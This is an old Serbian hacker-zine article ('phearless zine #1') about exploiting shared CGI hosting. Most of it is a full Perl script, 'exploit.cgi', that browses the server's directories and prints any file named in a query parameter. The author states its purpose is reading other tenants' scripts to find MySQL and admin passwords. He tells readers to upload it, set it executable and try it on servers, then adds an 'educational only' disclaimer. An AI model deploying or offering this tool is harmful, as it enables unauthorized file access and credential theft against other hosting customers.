Copy Link
Add to Bookmark
Report
1x10 CGI Exploiting
...................
...::: phearless zine #1 :::...
.......................>---[ CGI Exploiting ]---<.........................
........................>---[ by De1Rekt0n ]---<..........................
mil0s[at]headcoders[dot]net
Mnogi serveri danas imaju podrsku za cgi, CGI je Common Gateway Interface,
jos jedan server side scripting jezik preko koga mozete dosta toga izvuci.
Vecina servera je busno tako da mozete preko vase scripte citati fajlove na
serveru gde imate hosting, znaci mozete ici po serveru i citati tudje
scripte u kojima cesto mozete naci sifre za pristup mySQL-u ili sifre admin
delova sajta.
Ja sam napisao jednu cgi scriptu koja obavlja taj posao, nadam se da ce vam
dobro doci posto nisam se nesto potrudio da usavrsavam scriptu, ona
jednostavno radi posao:
------------------------------------------------------------exploit.cgi
#####################################################
#coded by De1Rekt0n #
#####################################################
#!/usr/bin/perl
&get_form;
use CGI qw (:standard);
$q= new CGI;
$dir=$FORM{selected};
$file=$FORM{fajl};
$filename = "exploit.cgi";
$putanja="/$dir";
print $q->header;
print<<EOF;
html>
<head>
<title>CGI exploit coded by De1Rekt0n</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table width="80%" border="0" align="center" height="180">
<tr>
<td bgcolor="#003366" width="42%" height="33"><font face="Verdana,
Arial, Helvetica, sans-serif" color="#FFFFFF">cgi
exploit coded by De1Rekt0n</font></td>
<td width="58%" height="33"> </td>
</tr>
<tr>
<td width="42%" align="left" valign="top" rowspan="2"><font
face="Geneva, Arial, Helvetica, san-serif" size="-1">Files and directories
in current directory<br>
EOF
open (FAJLA, "$file");
while (defined ($red=<FAJLA>)) {
chomp ($red);
print "<BR>$red";
}
close FAJLA;
opendir (DIR, "$putanja");
@fajlovi = readdir(DIR);
close(DIR);
$i=0;
while(defined($fajl=$fajlovi[$i])){
chomp ($fajl);
print<<HTML;
form name="form1" method="post" action="$filename">
<a
href="$filename?selected=$putanja/$fajl&fajl=$putanja/$fajl">$fajl</a><BR>
<input type="hidden" name="selected" value="$putanja/$fajl">
<input type="hidden" name="fajl" value="$fajl">
HTML
$i=$i+1;
}
print<<EOF;
/font></td>
<td width="58%" align="left" valign="top" height="22"><font
face="Geneva, Arial, Helvetica, san-serif" size="-1">Current directory
:$putanja</font></td>
</tr>
<tr>
<td width="58%" align="left" valign="top">
</td>
</tr>
</table>
</body>
</html>
EOF
exit;
###########################################################
# preuzimanje formulara #
###########################################################
sub get_form {
if ($ENV{"REQUEST_METHOD"} eq 'GET') {
$buffer = $ENV{'QUERY_STRING'};
} else {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
}
--------------------------------------------------------------------EOF
To je to nema puno toga sta reci o ovome jednostavno uploadujete scriptu
stavite je u vas cgi-bin direktorijum chmod-ujte na 755 i to je sve.
Nazalost vecina admina ne brine o ovome tako da ovo radi na mnogim serverima
pa isprobajte.
Ja ni na koji nacin nisam odgovoran na stetu koju nanesete ovo je namenjeno
samo u edukativne svrhe, a i da bi admini obratili paznju i zakrpili ovo.
Pozdravi: CyberB, BaCkSpAcE, PhrozenShade, _bl00dZ3r0_, AcidCookie,
BoyScout, DownBload, h4z4rd, fr1tz, Shatterhand, EsC, Exoduks, Re00t,
SunDance i svima koje sam zaboravio...
+---------------------------+
|site1: www.coders.co.yu |
|site2: www.ii-labs.org |
|mail: mil0s@headcoders.net|
+---------------------------+
